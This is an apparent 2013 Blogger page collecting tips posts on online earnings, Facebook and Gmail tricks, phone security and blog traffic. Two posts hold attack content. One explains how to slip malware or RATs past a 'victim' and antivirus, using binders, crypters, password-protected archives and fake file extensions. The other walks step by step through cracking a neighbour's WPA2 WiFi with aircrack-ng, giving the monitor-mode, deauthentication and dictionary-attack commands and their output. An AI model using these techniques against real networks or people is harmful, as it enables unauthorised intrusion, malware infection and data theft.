Search This Blog

Saturday 22 June 2013

10 Different Methods To Make Money Online


Web marketing is one of the biggest source of making money. Weather you are earning online as profession or as part time work. Internet is best way but its not so much easy to survive online Because their are too many ways to make money online but difficult part is, which we have to choose and which is easy to understand and having better earning also.
But Today i decided to discuss about the different online methods. I  already discuss about ways to make money from ads. But these are combine 12 ways for everyone who having less knowledge about web designs or other technical skills. 

 1. Cost Per Click ( CPC )

 This method is based on earning from click on ads published on your site, web pages, forum or any apps. I have already discuss about cpc in my article about ads. If you want to learn more in details about cpc must read my article about ways to make money from ads.
The following best cost per click networks which offers best rates for every click are 

 Google Adsense:-  It one of biggest and popular trusted network by everyone. Google Adsense Offers Highest CPC and CPM rates. But its earning is totally depend on your visitors location and CTR also. It not so easy to get approval of adsense.

 Media.net:- This is new network form by partnership of yahoo and bing with media.net. It is good competitor of adsense. It offers good CPC rates as compare to others.

 Chitika:- It is also most popular network for CPC. It also offers best revenue from ads but slightly lesser than Adsense

 Infolinks:- It is one the best program for text based ads. It offers good revenue for In-text link ads and for other banner ads also.

 Bidvertiser:- It is also relative good as compare to others but its is lesser as compare to above programs. But Still it is best one.
  

 2. Cost Per Mile ( CPM )

 This method is based on earning from every impression made on ads published on your website or blogs. For every 1000 unique impression you will earn money. But difficult task is to choose best network which offers best rates. It is also known as CPM method.
Some best CPM networks are
  • Tribalfusion
  • BrustMedia
  • BuysellAds
  • Valueclickmedia
  • VibrantMedia
  • Adpepper
  • Cpxinteractive
  • MadadsMedia


 3. Sell Affiliates Products

 Affiliates marketing is commission based program. Means  for every successful sale made buy you. Then you will earn commission. In my recent article i discuss about Bigrock affiliates program which offers commission for every sale of domains and hosting plans. If you want to learn more about affiliates then i suggest you read in  more detail about affiliates program. 
Here are following Best affiliates which offers good commission
  • Google Affiliates
  • ClickBank
  • Commission Junction
  • E-junkie
  • Amazon Affiliates
  • eBay Affiliates
  • DigiResult 
  • FreeLancer


 4. Cost Per Action ( CPA )

 In this method you will earn money for every successful action done by user which required on that spot. It is just like an affiliates but in this network if their ads about filling any details or subscribing email service or any other . If someone fill details required by ads then you will earn for every successful action.
  • ClickBooth
  • Peerfly
  • CPAWay
  • MaxBounty
  • CPALead
  • NeverBlue
  • Mgcash


 5. Earn From Uploading

Their are many programs which based on download program. But in last few years their are many report about increasing spam in these types of programs. It means for every successful download of your file will get earn. some programs are on premium based but some offers free service.
Some trusted download networks are
  • ShareCash.org
  • CashFile.org
  • Uploadables


 6. Write For Other Sites

If you are interested in writing online then this is best to make money . If have knowledge about any specific topic or field. Then the best way is to write articles for other services or you can also hire yourself to write for other blogs who want any author for their blogs.
Below Given are Some networks which gave you money to write for them
  • PayPerPost
  • Social Spark 
  • Sponsored Review
  • RevewMe
  • Payu2Blog 


 7. Complete Online Surveys

 This is one of the effective and easiest way for everyone who want to make money online because it don't required any web knowledge or technical skills.  In this network you have to fill the accurate information for every question ask on survey. This is best way to make side earning for working  2,3 hours on internet.
Some Best survey programs are
  • MySurvey
  • Dollersurvey
  • SurveyMonkey
  • SurveySpot
  • Myview
  • ClearvoiceSurvey
  • Toluna
  • GlobalTestMarket


 8. Online Projects / Freelance

 It is freelancer job means like data entry jobs. Their are many programs in which you can apply your application or as per rule. Then you have to complete specific project and task. For every successful completing project you will get earn. Their are many programs which are based on freelancer services.
Some Networks which are based on freelancing are below 
  • Microworkers
  • Elance 
  • Fiverr
  • Odesk
  • BreakStudio
  • ConstantContent


 9. Selling Products which you own

 It is also an effective to way to make money online if you have any product and service which you feel that peoples likes to buy. You can also put your product on online auction which is best idea to earn more. You can also design any product which you own. you can also sell some services or plans online to get earn. 
  • Amazon
  • eBay
  • Quikr
  • OLX
  • Sell.com
  • Gazelle.com


 10. Selling Products which you don't own

It just like an affiliates marketing selling any product which you don't owns but you can sell them of any direct advertiser or by using any network. You can also sell spaces on your website or blog for displaying ads of any product. Which help to earn money for every product sale.
  • Amazon Associates
  • ebay
  • Shirtcity
  • CafePress


 Above Mentions are 10 different ways to start working online. I try to cover more topics as much as possibles. I hope all the above methods are clear and helpful for everyone to make bright future online you have to do work hark. Their are many other networks related to above categories but i publish those which i feel simplest and best.

 /*If you find this article helpful then please don't forget to share it with others also. If you feel anything missing, wrong or find any doubt feel free to share your view in below comment box.*/

 Happy Earning..
Enjoy(-_-)
Posted by at No comments:

See Who Is Online On Facebook In Offline Mode From Mobile Without Online App

Here is the best trick for mobile to be in Offline mode and See which Friends are online form 'Mobile Phone' without any online thirdparty online App for u all fanz discovered by US.


Trick:~


  1. First Login in Ur Mobile Browser and Turn Off your Facebook Chat so that u seems Offline.
  2. Now Download Facebook Official app from www.facebok.com. It Must Not be Chat Application it Must Be Facebook Official App.
  3. Just Done Friends. You Can See your friends Online In your 'Messages' option of App. But you are offline for them.

/*Note: It is for Simple Phones and some smart Official  Apps Support It Directly*/
Enjoy Trick(-_-)
Posted by at No comments:

Access Gmail offline!!!


GMail introduced a new feature recently, that is browsing mails offline. Here for u fanz.

Steps:~

Today we are going to see how to do that.

First you need to install Google Gears, you can download the online installer from here
http://gears.google.com/

Run the online installer and it will install Google Gears on your system.

Now open your GMail and navigate to the settings and then to the Labs tab, there you will find a feature called offline, Enable that.

Thats it you are almost done, just a few clicks away. It will ask your permission to install offline access for GMail, click next.Then you get a Google Gears security warning, allow it.Click ok in the next window and you are done.It will download all your mails to your hard drive for offline browsing. You can see the status in the status window.

Have fun browsing gamil offline.

 Enjoy(-_-)
Posted by at No comments:

Use Facebook Without Internet Connection

I know Title Of  Post Sounds somewhat funny but friends You can use facebook with no internet connection And Even On Phones Which don't Have Internet Support.
And the best thing is that its Completly free.Facebook India has partnered with Fonetwish to bring Facebook on every mobile phone without requiring any apps or even the Internet.Now you can able to use facebook on cell phones like 1100.which don't have any browser or internet facility.
FB LOGO


-> The only You have to do is to  dial *325# 

from your mobile phone and follow the instructions.

First of all it asks for Facebook username and password,You have to enter these information via a number based command Prompt.
After You get in.You will see a menu like 
  1. news feed
  2. update status
  3. post on wall.
  4. friend request.
  5. messages.
  6. notifications. 

       *Account settings.

You have to enter desired Number in a number based command prompt for accessing your account.


NOTE:
  • This Service is only available in India. 

  • This Service Currently available On selected operators like Airtel, Aircel, Idea, Vodafone and Tata Docomo users.

  • Access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.


Enjoy!!!
Posted by at No comments:

How Hackers Send Virus,RAT,.EXE Files to Victim on Facebook,Gmail,Yahoo etc.


How Hackers Send Virus,RAT,.EXE Files to Victim on Facebook,Gmail,Yahoo etc.


FIRSTLY I WILL TELL YOU WHAT IS A COMPUTER VIRUS


WHAT IS A COMPUTER VIRUS ?

 A potentially damaging computer program’s, capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.

 TYPES OF VIRUSES :-
1) BOOT SECTOR VIRUS :- BOOT SECTOR VIRUSES INFECT EITHER THE MASTER BOOT RECORD OF THE HARD DISK OR THE FLOPPY DRIVE. THE BOOT RECORD PROGRAM RESPONSIBLE FOR THE BOOTING OF OPERATING SYSTEM IS REPLACED BY THE VIRUS. THE VIRUS EITHER COPIES THE MASTER BOOT PROGRAM TO ANOTHER PART OF THE HARD DISK OR OVERWRITES IT. THEY INFECT A COMPUTER WHEN IT BOOTS UP OR WHEN IT ACCESSES THE INFECTED FLOPPY DISK IN THE FLOPPY DRIVE. I.E. ONCE A SYSTEM IS INFECTED WITH A BOOT-SECTOR VIRUS, ANY NON-WRITE-PROTECTED DISK ACCESSED BY THIS SYSTEM WILL BECOME INFECTED.
EXAMPLES OF BOOT- SECTOR VIRUSES ARE MICHELANGELO AND STONED.

2) FILE OR PROGRAM VIRUSES :- SOME FILES/PROGRAMS, WHEN EXECUTED, LOAD THE VIRUS IN THE MEMORY AND PERFORM PREDEFINED FUNCTIONS TO INFECT THE SYSTEM. THEY INFECT PROGRAM FILES WITH EXTENSIONS LIKE .EXE, .COM, .BIN, .DRV AND .SYS .

SOME COMMON FILE VIRUSES ARE SUNDAY, CASCADE.

3) MULTIPARTITE VIRUSES :- A MULTIPARTITE VIRUS IS A COMPUTER VIRUS THAT INFECTS MULTIPLE DIFFERENT TARGET PLATFORMS, AND REMAINS RECURSIVELY INFECTIVE IN EACH TARGET. IT ATTEMPTS TO ATTACK BOTH THE BOOT SECTOR AND THE EXECUTABLE, OR PROGRAMS, FILES AT THE SAME TIME. WHEN THE VIRUS ATTACHES TO THE BOOT SECTOR, IT WILL IN TURN AFFECT THE SYSTEM’S FILES, AND WHEN THE VIRUS ATTACHES TO THE FILES, IT WILL IN TURN INFECT THE BOOT SECTOR.

 This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

 Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989. Other examples are Invader, Flip, etc.
4) STEALTH VIRUSES :- THESE VIRUSES ARE STEALTHY IN NATURE MEANS IT USES VARIOUS METHODS FOR HIDING THEMSELVES TO AVOID DETECTION. THEY SOMETIMES REMOVE THEMSELVES FROM THE MEMORY TEMPORARILY TO AVOID DETECTION BY ANTIVIRUS. THEY ARE SOMEWHAT DIFFICULT TO DETECT. WHEN AN ANTIVIRUS PROGRAM TRIES TO DETECT THE VIRUS, THE STEALTH VIRUS FEEDS THE ANTIVIRUS PROGRAM A CLEAN IMAGE OF THE FILE OR BOOT SECTOR.

5) POLYMORPHIC VIRUSES :- POLYMORPHIC VIRUSES HAVE THE ABILITY TO MUTATE IMPLYING THAT THEY CHANGE THE VIRAL CODE KNOWN AS THE SIGNATURE EACH TIME THEY SPREAD OR INFECT. THUS AN ANTIVIRUS PROGRAM WHICH IS SCANNING FOR SPECIFIC VIRUS CODES UNABLE TO DETECT IT’S PRESENSE.

6) MACRO VIRUSES :- A MACRO VIRUS IS A COMPUTER VIRUS THAT “INFECTS” A MICROSOFT WORD OR SIMILAR APPLICATION AND CAUSES A SEQUENCE OF ACTIONS TO BE PERFORMED AUTOMATICALLY WHEN THE APPLICATION IS STARTED OR SOMETHING ELSE TRIGGERS IT. MACRO VIRUSES TEND TO BE SURPRISING BUT RELATIVELY HARMLESS.A MACRO VIRUS IS OFTEN SPREAD AS AN E-MAIL VIRUS. WELL-KNOWN EXAMPLES ARE CONCEPT VIRUS AND MELISSA WORM
WAYS HACKERS SEND YOU SERVER,VIRUSES AND .EXE FILES VIA INTERNET:
1. Binder - Binder is a software which is used to bind or collaborate the server or virus you have created with some other file like a MP3,JPEG or any other file.You can fool the victim by sending him a song or picture and as soon as he opens the picture or song the Binder also gets open and starts working.
2. Crypter - A crypter is a tool which changes the binary code of the .exe (virus,RAT etc.)file and applies many encryptions on it which makes the .exe file undetectable.You can use Chrome Crypter.

3. Zipping - Another smart way to  send files is by putting your server in a Zipped folder and then sending it to the victim.Zipping the file changes the extension of the srver from .exe to .zip,which bypasses the file transfer facility of gmail,facebook,yahoo etc..
USE WINRAR & Give password of that file, so AV's not enter in file.

4. Extension - You can change the extension of the Server you want to send as it is not possible to send .exe files,so you can change the extension of .exe to .jpeg,.mp3 etc. when you save the file and then send it to the victim.But in this method you will have to tell the victim to change the extension back to .exe after he receives the server.This method can only be used in cases where the victim is very dumb and has no knowledge of this field.
A person who is not much interested in cyber security should have knowledge of above mentioned methods as they can be used against anyone.
ENJOY !!
Posted by at No comments:

How to secure your smartphone from hackers



Now a days, We are using smartphone for our daily life such E-mail, facebook, twitter, paypal, banking etc..its all the our personal working. So their is more important to protect our smartphone from being hacked.
Using some security improvement helps you to protect your phone. Actually the method which you adopt  to protect your computer can be used to protect your smartphone too. Use following given below tips to secure your smart phone.





You can also use the some Antivirus & Security for protect your smartphone

Top 7 Android Security-Antiviurs Apps



 1. Use Passcodes Everywhere:

 Whether you have an Android phone or an iPhone, you can prevent access to your device by adding a passcode or a lock pattern on Android. This simple security measure can save tour sensitive information This is especially important if you have a bunch of apps installed where personal data is stored like financial apps (Mint, bank apps, etc), note apps  etc.The home screen passcode is important because a lot of the email apps (Mail on iPhone and Gmail on Android) don’t even have an option to passcode your email. Emails can contain a lot of private information and since most people go to parties and leave their phones on tables and counters. Sp passcode is necessary.
2. Protect Your iCloud & Google Account:

 The second thing most is that if someone can access into your iCloud or Google account, they can gain access to a lot of data that you might be creating and editing from your smartphone. In these times, it’s a necessary  to enable 2-step verification on both of these accounts.Your Google account basically logs you into all Google services from YouTube to Gmail to Google Play to Google Maps to Google Calendar to Picasa to Google+, etc, etc, etc.
3. Avoid Jailbreaking or Rooting Your Smartphone:

 If you are jailbreak or root your phone for fun and enjoyment, then good for you. But you have to avoid this because it can mess up your phone and cause you more grief than happiness. Secondly, you won’t be able to update your phone with the latest updates to the OS since it’ll be in an unsupported mode.
4. Be Careful With the Apps You Install:

 This is especially important on Android devices. Google recently removed 50,000 apps that were suspected containing viruses. There are a lot  of apps that contain malware, viruses or other sneaky software to steal your data or damage your phone. The Apple app store also has this problem.So,be careful about installing apps.
5. Use an App Instead of the Browser:

 If you’re doing banking on your phone or stock trading or anything else that contain personal sensitive information between your phone and the Internet, it’s best to use an official app for that site or company rather than opening using the browser on your phone.For example, Chase, Bank of America and lots of other big financial institutions have their own apps for iOS and Android.
6. Control What an App Can Access:

 You’ve probably seen the following message on your iPhone a hundred times already:There are all types of these “AppName Would Like to Access Your Data” messages. Data can be photos, location, contacts etc. Don’t just click OK all the time. If you click anything all the time, it’s better to just choose Don’t Allow and if you really can’t use the app later on, you can manually go back in and change it to allow access.
7. Keep Data Backed Up:

 It’s not only a good idea to keep your smartphone backed up in case if it gets stolen and you have to remotely wipe it clean. Apple users can install the Find My iPhone app, which will let you remotely lock a phone and remotely wipe it if you know it’s been stolen.If you don’t have your data backed up, you’ll lose it all if it’s stolen. If you back it up locally or in the cloud, you’ll be able to wipe your phone and get all your data back on your new phone.On Android, there is a built-in backup tool, but it doesn’t backup everything on your phone like the iOS does.
8. Report Your Phone Stolen:

 There has been a stolen phone database created that is shared between the major wireless carriers. You can report your phone stolen and that will prevent anyone from connecting to the carrier and using data or minutes. If they try to wipe it, replace the SIM, etc, it still won’t allow them to activate on any of the carriers because of the serial number.
9. Update the OS:

 Just like you have to constantly install Microsoft security updates for your PC, it’s a good idea to install the latest updates for your smartphone. If there are no major issues with the update like degradation of battery life, etc, but if nothing stands out, then update the phone.In addition to updating the OS, it’s also a good idea to update the apps installed on your phone.
10. Wireless & Bluetooth:

 When you’re not at home, it’s best to try to disable the wireless and bluetooth altogether and use your 3G or 4G connection if you can. The moment you connect to an untrusted wireless network, you’re open to hackers scanning for victims over the network. A hacker  try to connect to your smartphone and steal data, etc.If bluetooth is enabled and discoverable, it gives hackers another way to possibly see the data being passed between the bluetooth device and your phone.
Posted by at No comments:

Killer Tips To Increase traffic on your Blog

As per one estimate, there are more than 156 million public blogs found across the globe. But how many of these are read and followed or even found over any search engine is a big question. Creating any blog for business or any other purpose is a simple thing to do; however, making it popular across your readers is a challenge. You have to invest your time, money and efforts in getting the right target audience for your blog. The below mentioned tips would guide you to get a substantial amount of traffic to your blog.
website traffic
Incorporate quality content:This is the most important element of blogging. People come in search for interesting and useful content at various blogs. Updating content on a regular basis with useful and quality content can help you in getting traffic to your blog. If you frequently update your blog with a proper weekly schedule, you would get repeat visitors. This will also make your blog search engine friendly improving your web page rankings over prominent search engines. To drive effective traffic to your blog, you should always have meaningful in your posts along with proper frequency.


The search engines:
You very well understand the importance of content optimization with popular and relevant keyword and key phrase research. However, this doesn’t mean that your content comes with excessive use of keywords or key phrases. By doing this, you will reduce the quality of your blog posts. Besides, these keywords should be used in your title, description and tags. Further, you need couple of quality inbound links as an effective SEO strategy. For this, you need to put your blog content over popular sites and blogs related to your niche area and link back to your blog. While linking back, you should rely on using popular and relevant keywords. These things will make your blog more visible over popular search engines.


Harness the power of comments:
Commenting is an easy and effective tool to increase traffic to your blog. To begin with, you need to respond the comments left over your blog posts by your visitors and thus trigger a two way communication. This will improve reader loyalty. Secondly, you need to leave comments on other blogs; this will help you to pull new and unique visitors. While leaving comments, you should include your blog’s URL; this will help you in creating backlinks for your blog. It is therefore important to leave meaningful comments over other blogs and provide a link to read more on your blog.  


Guest posts:
The idea of guest posting is really helpful in getting a decent amount of readers or traffic to your blog. This is pretty different than adding comments. Once you are able to connect with any popular blog of your niche area, create the opportunity for guest posts. If you post something interesting, useful and relevant content, you can certainly expect a good amount of traffic to your blog.  


Try forums:You can find a wide range of forums unlike the way you see blogs. You just have to find a relevant forum of your niche area subject and keep posting on a frequent basis.

Submit your posts on social bookmarking sites:
In order to boost traffic to your blog, you can think of submitting your quality posts and articles to various social bookmarking sites. Submitting your best posts at sites like StumbleUpon, Digg, Reddit, etc. are simple ways of getting good traffic to your blog.

-> To run your blog with success, you need traffic. Trying the above tips and tricks can help you get a substantial amount of traffic to your blog. You just have to try these ideas with consistency to reap the best result.

Posted by at No comments:

send friend request on facebook when blocked

Facebook friend Request Blocked??? Dont Worry!!



Facebook is a popular social network site where we can easily connect with our friends, family's. However Facebook don't makes it easy for us to add unknown people as our friends. You may have experienced a stage at least one time in your FB account showing a popup message that your friend request has been blocked for 1 day, 3 days, 7 days, 15 days or even 30 days. At that time you can't send out friend request on Facebook to anybody no matter if you know that person or not you been banned to send request for a particular time period. This is due to Facebook guidelines which don't allow us to send friend request to strangers because it considers it as spam, for that reason facebook temporarily turned off your sending friend request option. This is usually done to protect personal privacy of peoples, quite a few people use to add unknown people as their friends and  make misuse of their profile. Here we will give you some trick not to get banned from sending friend request on facebook and some guidelines to keep your account not disable.


This is an working legal trick to send friend request to your mutual friends and unknown people 

1.Get the person's email address first .
2.Visit Add Personal Contacts as Friends
3.Here you can send friend request even if your are blocked by using their email address.
4.If you want to send friend request to lot's of friends here is an quick and easy way to do this.
5.Open up a new notepad file, paste all your friends email separated by comma (,)
6.Save the notepad file with the extension .vcf
7.This is your list of your contact files containing your friends email address.
8.Go to Add Personal Contacts as Friends click on the last option other tools there you can find upload contact file.
9.Browse your .vcf file and upload to the facebook.
10.It will send friend request to your friend's by email and facebook.

You are done!
Simple yet effective!




-> How Not to Get Blocked by Sending Friend Request on FB

If you just joined facebook add some few peoples you know them say about 10-20 members that you closely know. Let these people confirm your friend request first. Don't send frequent friend request to peoples,let the pending request be confirmed first after that you can send request. Always add people with a time gap of 2-4 minutes. If you send request consistently then a popup box showing to solve the captcha. Add people, which has high number of mutual friends so that facebook don't consider it as spam.Let us know if you any tricks to send friend request while your block in the comments below.

(-_-) Hope you enjoy this Article.
Posted by at No comments:

facebook fun page hack attack

This summary is not available. Please click here to view the post.
Posted by at No comments:

Hack wifi/WEP/WPA2 password using aircrack-ng

wifi hack

 Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.
In my previous article I saw you to How to crack wifi or wireless password using Backtrack.

 Hacking wireless wifi passwords

 The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as 
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or 
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .

 Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of 
14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
their device supports for many security encryption techniques.  Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in
addressbar and here you will get your routers configuration, where you can select.

 Cracking Wireless Network
As we have read above this is an easy task, we just have to use our network card in monitor mode so
as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using  aircrack-ng. But only small number if cards support this mode under windows.
But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.

 List of compatible cards.

 Now download aircrack-ng for linux or windows platform from HERE.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:

 airmon-ng     - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng   - used to generate additional traffic on the wireless network
aircrack-ng   - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.

 Using aircrack-ng

 First, put the card in monitor mode :

 root@bt:~# airmon-ng

 Interface       Chipset         Driver

 wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

 root@bt:~# airmon-ng start wlan0

 Interface       Chipset         Driver

 wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

 Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

 root@bt:~# airodump-ng mon0

  CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                        

  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          

  00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet   

  BSSID              STATION            PWR   Rate   Lost  Packets  Probe         

  00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

 Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

 At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate.  Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

 root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

 As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7        

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  

  00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet         

  BSSID              STATION            PWR   Rate   Lost  Packets  Probe 

  00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

 Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

 Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
that is very slow, but guarantees that you will find the key at some point in time.

 The first option is by using a worklist/drstionary file.  A lot of these files can be found on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such 
as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run

 aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

 The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In 
other words, you may get lucky and get the key very fast, or you may not get the key at all.

 The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
password combination with all possible character sets and feed them into aircrack.

 Hope you enjoy(-_-) this post.!
Posted by at No comments:
Subscribe to: Posts (Atom)
Blogger Widgets